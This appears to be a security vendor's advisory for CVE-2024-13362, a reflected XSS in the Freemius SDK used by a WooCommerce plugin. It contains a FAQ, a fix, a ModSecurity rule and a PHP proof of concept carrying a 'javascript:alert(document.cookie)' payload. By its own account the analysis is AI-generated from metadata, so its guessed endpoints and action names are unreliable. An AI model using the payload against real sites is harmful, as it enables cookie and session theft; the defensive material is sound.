What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius framework used in various WordPress plugins, specifically the Remove Add to Cart WooCommerce plugin. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter, which can execute in a victim’s browser.

How does this vulnerability work?

The vulnerability occurs when user-supplied input in the ‘url’ parameter is not properly sanitized or escaped before being reflected in the web page. An attacker can craft a malicious URL containing JavaScript code, tricking a user into clicking it, which then executes the script in their browser.

Who is affected by this vulnerability?

Any WordPress site using the Freemius framework version 2.10.1 or earlier, particularly with the Remove Add to Cart WooCommerce plugin version 1.4.7, is at risk. Site administrators should check their installed plugins for these versions to assess vulnerability.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Freemius framework and the Remove Add to Cart WooCommerce plugin installed on your WordPress site. If they are version 2.10.1 or earlier and 1.4.7 respectively, your site is potentially vulnerable.

What is the recommended fix for this vulnerability?

To remediate this vulnerability, implement strict input sanitization and output escaping for the ‘url’ parameter. Use WordPress functions like esc_url_raw() for sanitization and esc_url() or esc_js() before outputting in HTML or JavaScript contexts.

What does the CVSS score of 6.1 indicate?

A CVSS score of 6.1 indicates a medium severity level, meaning that while the vulnerability is not critical, it can still pose a significant risk if exploited. It requires user interaction to trigger, but the potential for data theft or account compromise exists.

What are the potential impacts of this vulnerability?

Successful exploitation can lead to cookie theft, session hijacking, or redirection to malicious sites. Although the attack is limited to the victim’s browser session, it can be leveraged for broader phishing attacks, potentially compromising user accounts.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates the vulnerability by simulating a request to a vulnerable endpoint with a crafted URL containing a JavaScript payload. This demonstrates how an attacker can exploit the lack of sanitization to execute arbitrary scripts in the victim’s browser.

What precautions can I take to prevent exploitation?

In addition to applying the recommended fixes, consider implementing Content Security Policy (CSP) headers, validating URLs against a whitelist, and educating users about phishing tactics. Regularly update plugins and frameworks to their latest versions to minimize risks.

Is this vulnerability common in other plugins?

Yes, similar vulnerabilities can exist in other plugins and themes that use the Freemius framework or have inadequate input sanitization practices. It is essential to audit all plugins for security vulnerabilities routinely.

What should I do if I cannot update my plugin immediately?

If an immediate update is not possible, consider disabling the vulnerable plugin until a patch is available. Additionally, monitor user activity closely and educate users to avoid clicking suspicious links.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 8, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (remove-add-to-cart-woocommerce)

CVE ID CVE-2024-13362

Plugin remove-add-to-cart-woocommerce

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.4.7

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):

This vulnerability is a Reflected DOM-based Cross-Site Scripting (XSS) affecting the Freemius framework (versions <= 2.10.1) as used by multiple WordPress plugins and themes, specifically impacting the "Remove Add to Cart WooCommerce" plugin (version 1.4.7). The flaw allows unauthenticated attackers to inject arbitrary web scripts via the 'url' parameter, which executes in the victim's browser upon clicking a crafted link. The CVSS v3.1 score is 6.1 (Medium), with network attack vector, low complexity, no privileges required, and user interaction needed (click).

Root Cause: Based on the CWE-79 classification and description, the root cause is improper neutralization of user-supplied input in the 'url' parameter during web page generation. Inferred from the framework context, the Freemius SDK likely reflects user-supplied URLs back into JavaScript execution contexts (e.g., via document.write, innerHTML, or window.location assignments) without proper sanitization or output escaping. Atomic Edge analysis concludes that the framework fails to sanitize or escape the 'url' parameter before using it in DOM manipulation routines, making it vulnerable to script injection. This conclusion is inferred from metadata and the common behavior of SDK-style components that handle redirects or link generation.

Exploitation: An unauthenticated attacker crafts a malicious URL containing JavaScript code in the 'url' parameter, such as `?url=javascript:alert(document.cookie)`. The attacker would trick a victim into clicking a crafted link pointing to a page using the Freemius SDK (e.g., "/?freemius_action=some_action&url=…") or a plugin endpoint that reflects the parameter. When the victim clicks the link, the browser executes the injected script in the context of the vulnerable WordPress site, allowing data theft (e.g., cookies, session tokens) or further malicious actions. The attack requires user interaction (click) but no authentication, making it a phishing vector.

Remediation: The fix requires strict input sanitization and output escaping for the 'url' parameter. Atomic Edge research recommends using WordPress's built-in functions: `esc_url_raw()` for storage/sanitization, and `esc_url()` or `esc_js()` before output in HTML or JavaScript contexts. The Freemius SDK should validate the URL against a whitelist of allowed schemes (http, https) and strip dangerous protocols like 'javascript:' or 'data:'. Additionally, applying CSP headers or using JavaScript encoding functions would prevent injection in dynamic DOM operations.

Impact: Successful exploitation enables stored cross-site scripting in reflective contexts, leading to cookie theft, session hijacking, redirection to malicious sites, or defacement. Since unauthenticated attackers can trigger the XSS, widespread campaigns targeting admin users could compromise site accounts. The impact is limited to the victim's browser session (not server-side), but combined with social engineering (e.g., phishing emails with crafted links), attackers can achieve significant harm, including account takeover if administrator cookies are stolen. The vulnerability affects multiple plugins/themes using Freemius, widening the attack surface.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Target: Block XSS via url parameter in Freemius SDK endpoints (AJAX or direct)
SecRule REQUEST_URI "@contains /admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius Reflected XSS via url param',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_POST:action "@streq freemius_handler" "chain"
    SecRule ARGS:url "@rx ^(javascript|data|vbscript):" 
      "t:lowercase,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Assumptions:
// - The vulnerable endpoint is typically accessed via a WordPress plugin with Freemius SDK integration.
// - The 'url' parameter is reflected without sanitization, likely in a JavaScript context.
// - We simulate a request to a common Freemius AJAX handler or SDK endpoint.

// Configuration
$target_url = 'http://example.com';  // Replace with target WordPress site URL
$endpoint = '/wp-admin/admin-ajax.php';  // Common AJAX handler; adjust based on plugin

// Payload: JavaScript alert to demonstrate XSS
$payload = 'javascript:alert(document.cookie)';

// Construct malicious URL with XSS payload
$malicious_url = $target_url . $endpoint . '?action=freemius_checkout&url=' . urlencode($payload);

// For DOM-based XSS, the payload might be fetched via JavaScript and evaluated.
// We simulate clicking the link by sending a request with the payload in the parameter.

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] Sent XSS payload to: $malicious_urln";
echo "[+] HTTP Response Code: $http_coden";
// The response would likely contain the payload reflected in JavaScript code.
// In a real attack, the victim would click the crafted link with the payload.
?>

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius framework used in various WordPress plugins, specifically the Remove Add to Cart WooCommerce plugin. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter, which can execute in a victim’s browser.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability occurs when user-supplied input in the ‘url’ parameter is not properly sanitized or escaped before being reflected in the web page. An attacker can craft a malicious URL containing JavaScript code, tricking a user into clicking it, which then executes the script in their browser.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Freemius framework version 2.10.1 or earlier, particularly with the Remove Add to Cart WooCommerce plugin version 1.4.7, is at risk. Site administrators should check their installed plugins for these versions to assess vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the Freemius framework and the Remove Add to Cart WooCommerce plugin installed on your WordPress site. If they are version 2.10.1 or earlier and 1.4.7 respectively, your site is potentially vulnerable.
What is the recommended fix for this vulnerability?
Mitigation strategies
To remediate this vulnerability, implement strict input sanitization and output escaping for the ‘url’ parameter. Use WordPress functions like esc_url_raw() for sanitization and esc_url() or esc_js() before outputting in HTML or JavaScript contexts.
What does the CVSS score of 6.1 indicate?
Understanding the severity
A CVSS score of 6.1 indicates a medium severity level, meaning that while the vulnerability is not critical, it can still pose a significant risk if exploited. It requires user interaction to trigger, but the potential for data theft or account compromise exists.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation can lead to cookie theft, session hijacking, or redirection to malicious sites. Although the attack is limited to the victim’s browser session, it can be leveraged for broader phishing attacks, potentially compromising user accounts.
How does the proof of concept demonstrate the issue?
Technical illustration of exploitation
The proof of concept illustrates the vulnerability by simulating a request to a vulnerable endpoint with a crafted URL containing a JavaScript payload. This demonstrates how an attacker can exploit the lack of sanitization to execute arbitrary scripts in the victim’s browser.
What precautions can I take to prevent exploitation?
Best practices for security
In addition to applying the recommended fixes, consider implementing Content Security Policy (CSP) headers, validating URLs against a whitelist, and educating users about phishing tactics. Regularly update plugins and frameworks to their latest versions to minimize risks.
Is this vulnerability common in other plugins?
Wider implications
Yes, similar vulnerabilities can exist in other plugins and themes that use the Freemius framework or have inadequate input sanitization practices. It is essential to audit all plugins for security vulnerabilities routinely.
What should I do if I cannot update my plugin immediately?
Interim measures
If an immediate update is not possible, consider disabling the vulnerable plugin until a patch is available. Additionally, monitor user activity closely and educate users to avoid clicking suspicious links.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations